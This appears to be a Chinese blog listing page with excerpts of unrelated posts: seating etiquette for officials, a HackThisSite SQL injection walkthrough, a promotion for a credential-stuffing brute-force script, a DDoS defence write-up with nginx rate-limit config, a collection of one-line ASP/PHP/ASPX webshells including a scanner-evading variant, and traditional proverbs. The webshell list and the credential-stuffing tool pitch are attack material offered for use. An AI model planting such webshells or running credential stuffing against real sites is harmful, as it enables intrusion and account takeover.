领导座次安排(基本套路都有了)

一、会议主席台座次安排 主席台座次排列,领导为单数时,主要领导居中,2号领导在1号领导左手位置,3号领导在1号领导右手位置;可参见下图的座次排列图: 领导为偶数时,1、2号领导同时居中,2号领导依然在1号领导左手位置,3号领导依然在1号领导右手位置。可参见下图的座次排列图: 二、宴请座次安排 A:中餐, 主陪面对门↓ 很多时候还可以这么排↓ B:西餐↓ 三、照相 次序排列等同与主席台排列方式↓ 四、沙发室小型会议/商务接洽 五、长条桌会议/商务接洽 1. A为客方(或上级领导)↓ 2. 主方在进大门的左边,客方在进大门的右边 六、小车座位的安排 司机驾车时↓ 主人驾车时↓ 坐大车时↓ 说明: 1. 小轿车1号座位在司机的右后边,2号座位在司机的正后边,3号座位在司机的旁边。(如果后排乘坐三人,则3号座位在后排的中间)。中轿主座在司机后边的第一排,1号座位在临窗的位置。 2. 如果由主人亲自驾驶,以驾驶座右侧为首位,后排右侧次之,左侧再次之,而后排中间座为末席,前排中间座则不宜再安排客人。 ­ 3. 主人夫妇驾车时,则主人夫妇坐前座,客人夫妇坐后座,如果主人夫妇搭载友人夫妇的车,则应邀友人坐前座,友人之妇坐后座,或让友人夫妇都坐前座。 ­ 4. 主人亲自驾车,坐客只有一人,应坐在主人旁边。若同坐多人,中途坐前座的客人下车后,在后面坐的客人应改坐前座,此项礼节最易疏忽。 ­ 5. 旅行车接送客人:旅行车以司机座后第一排,即前排为尊,后排依次为小。其座位的尊卑,依每排右侧往左侧递减。 七、电梯礼仪 八、喜宴安排 如当地有习俗,遵从习俗,比如有些地方习惯将新人和要好的平辈放在主桌上。 Advertisements

hackthissite realistic mission 2

试试看SQL注入吧! 如果这个用户名密码验证的SQL语句为strSql = “SELECT *FROM tbl WHERE username=’” + username.text + “‘ AND password=’” + password.text + “‘”; 那么假设在用户名文本框里输入 ’ or 1=1– ,那么SQL语句变为SELECT * FROM tbl WHERE username=” or 1=1– AND password=” 尽管username为空串,但是和1=1这个恒真的等式或运算以后,SELECT后的结果就是表里所有的数据,而1=1后面的–把后面的AND password=”注释掉了,如果程序里面再判断只要结果不为空即登录成功的话…嘿嘿~ Mission 2 complete!

撞库攻击脚本

htpwdScan 是一个简单的HTTP暴力破解、撞库攻击脚本. 它的特性: 支持批量校验并导入HTTP代理,低频撞库可以成功攻击大部分网站,绕过大部分防御策略和waf 支持直接导入互联网上泄露的社工库,发起撞库攻击 支持导入超大字典

DDos攻击和预防

晚上23点左右收到大量的监控报警,公司网站直接不能访问了,立即登录服务器,直接top看到情况如下: 发现负载都达到了800了,机器眼看就要爆了,首先先停了mysql,发现负载有点下降,联系了开发同事一同查看,因为今天新上线了一些代码,可能是新上代码的问题,随后看到负载依然没降,然后将php和nginx都重启了,虽然短暂的降了一些,过一会立马负载又起来了,这时看了下nginx日志,看是不是用户访问导致的问题,结果一看就发现问题了,如下: 30分钟发了你60w+的请求。 发现这个ip不停的发请求,很明显,是被攻击了,临时将这个ip在nginx中deny掉,直接返回给它503,配置如下:在server中加入 负载也慢慢降下来了,服务也正常了,当时太晚了,洗洗就睡了,结果第二天早上一来又发现网站打不开了,直接看nginx日志,攻击者换了一个ip,跟昨晚的现象一样,这次直接在源头把他干掉了,就是添加iptables,如下: 将攻击的ip全部写入iptables里面,然后联系机房看能不能做策略协助解决这种CC攻击,最后机房那边也将这些ip给封了,但是攻击者在换ip怎么办?不可能他换一个我加一条把,看来只能发大招了,写了个iptables脚本,如下: 统计tcp连接,同一ip超过500次tcp连接的肯定就是攻击者的ip了,正常用户也不可能一下去开500个窗口去访问我的网站吧,然后将这个ip直接在iptables上面干掉,现在好了,问题解决了,这种CC攻击有一个特点就是用的源ip基本都是固定的,DDOS有些可能是用不同原ip进行攻击,那么这种防御就显得有些吃力了。那遇到不同源ip攻击怎么防御呢? 首先要联系机房,一般机房都有监控和防御设备,让机房帮忙解决一些问题可能更有效,不能在iptable上面去防御,就只能通过nginx去防御了,让nginx去识别哪些是攻击者,哪些是真正的用户?其实nginx有2个模块:ngx_http_limit_conn_module和ngx_http_limit_req_module 可以参考官方文档: http://nginx.org/cn/docs/http/ngx_http_limit_req_module.html http://nginx.org/cn/docs/http/ngx_http_limit_conn_module.html 首先在http中定义,如下: limit_conn_zone $binary_remote_addr zone=addr:10m; limit_req_zone $binary_remote_addr zone=one:10m rate=1r/s; 然后到你需要限制的目录下面,server段中,一般就是php请求,如下: location ~* ^/(.*)\.php?$ { limit_conn addr 3; limit_req zone=one burst=2 nodelay; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $host_path/$fastcgi_script_name; include fastcgi_params; } 应用这2条规则后,只要需要执行php脚本的这些页面同一个IP只许建立3个连接,并且每秒只能有1个请求(突发请求可以达到2个)。 虽然这样的规则一般来说对正常的用户不会产生影响(极少有人在1秒内打开3个页面),但是为了防止影响那些手快的用户访问,可以在nginx中自定义503页面,503页面对用户进行提示,然后自动刷新,这个参数可以根据自己的情况进行更改,这样不管攻击者是多个ip还是单个ip攻击都可以防御到, 如果在nginx日志中能找到攻击者特有的代码,这样就更容易防御, 比如User-agent。下面的是某一次CC攻击时的User-agent Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)Cache-Control: no-store, … More DDos攻击和预防

一句话木马

<%execute request(“value”)%> <%eval request(“value”)%> 常用一句话木马 asp一句话木马: <%execute(request(“value”))%> php一句话木马: <?php @eval($_POST[value]);?> aspx一句话木马: <%@ Page Language=”Jscript”%> <%eval(Request.Item[“value”])%> 其他一句话木马: <%eval request(“value”)%> <%execute request(“value”)%> <%execute(request(“value”))%> <%If Request(“value”)<>”” Then Execute(Request(“value”))%> <%if request (“value”)<>””then session(“value”)=request(“value”):end if:if session(“value”)<>”” then execute session(“value”)%> execute request(“value”) <%@ Page Language=”Jscript”%> <%eval(Request.Item[“value”],”unsafe”);%> 可以躲过雷客图的一句话木马: <% set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″) ms.Language=”VBScript” ms.AddObject “Response”, Response ms.AddObject “request”, request ms.ExecuteStatement(“ev”&”al(request(“”value””))”) %> … More 一句话木马

混社会大全,不服不行

人情是纸张张薄,事事如棋局局新。 贫在闹市无人问,富在深山有远亲。 不信但看宴中酒,杯杯先敬富贵人。 门前拴上高头马,不是亲来也是亲。 门前放根讨饭棍,亲戚故友不上门。 世上结交须黄金,黄金不多交不深。 纵令然诺暂相许,终是悠悠路行人。 有钱有酒多兄弟,急难何曽见一人。 胜者为王败者寇,只重衣冠不重人。 三贫三富不到老,十年兴败多少人。 在官三日人问我,离官三日我问人。 古人不见今时月,今月曾经照古人。 近水楼台先得月,向阳花木易逢春。 谁人背后无人说,谁人背后不说人。 百炼化身成铁汉,三缄其口学金人。 十分伶俐使七分,常留三分与儿孙。  君子落得做君子,小人枉自做小人。  山中自有千年树,世上难逢百岁人。   岂无远道思亲泪,不及高堂念子心。 堂上二老是活佛,何用灵山朝世尊。 平身不做皱眉事,世上应无切齿人。 越奸越狡越贫穷,奸狡原来天不容。 富贵若从奸狡起,世间呆汉喝西风。 求人须求大丈夫,济人须济急时无。 茫茫四海人无数,哪个男儿是丈夫。 人情是水分高下,世事如云任卷舒。 如山不怕伤人虎,只怕人情两面刀。 务求到处人情好,不饮随他酒价高。 知事少时烦恼少,识人多处是非多。 秋至满山皆秀色,春来无处不花香。 贫无达士将金赠,病有高人说药方。 美人卖笑千金易,壮士穷途一饭难。 少时总觉为人易,华年方知立业难。 用心计较般般错,退迟思量事事难。 世上闲愁千万斛,不叫一点上眉端。 毁身每是作恶日,成名皆在行善时。 莫把真心空计较,唯有大德享万年。 谗言败坏真君子,美色消磨狂少年。 神仙难断阴骘事,黄天不昧苦心人。 人恶人怕天不怕,人善人欺天不欺。 善恶到头终有报,只争来早与来迟。 平身不做亏心事,半夜敲门心不惊。 万事劝人休瞒昧,举头三尺有神明。 鬼神可敬不可谄,冤家宜解不宜结。 人生何处不相逢,莫因小怨动声色。 好义固为人所钦,贪利乃为鬼所笑。 贤者不炫己之长,君子不夺人所好。 善业可为须着力,是非闲杂莫劳心。 良田不由心田置,产业变为冤业折。 千年天地八百主,田是主人人是客。 阴地不如新地好,命运在人不在天。 有理问得君王倒,有钱难买子孙贤。 水暖水寒鱼自知,花开花谢春不管。 蜗牛角上校雌雄,石光火中争长短。 … More 混社会大全,不服不行